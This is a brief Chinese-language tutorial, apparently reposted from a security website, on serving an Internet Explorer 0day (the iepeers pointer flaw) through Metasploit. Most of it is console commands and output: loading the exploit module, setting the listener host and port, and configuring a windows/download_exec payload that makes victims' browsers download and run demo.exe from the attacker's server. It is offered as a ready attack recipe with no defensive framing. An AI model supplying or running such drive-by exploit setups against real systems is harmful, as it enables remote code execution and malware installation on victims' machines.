最新IE 0day漏洞Metasploit生成方法

一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb
二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。改个名字叫ie.rb
三、启动msfconsole
四、msf > use exploit/test/ie

      msf exploit(ie) > show optinos

回显：

Module options:

   Name        Current Setting Required Description
   ----        --------------- -------- -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id Name
   -- ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080

msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec

msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.

msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.

然后打开http://192.168.0.3:8080/4rJ0JRSnX55wAY，你就可以看到源码了。
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1165.html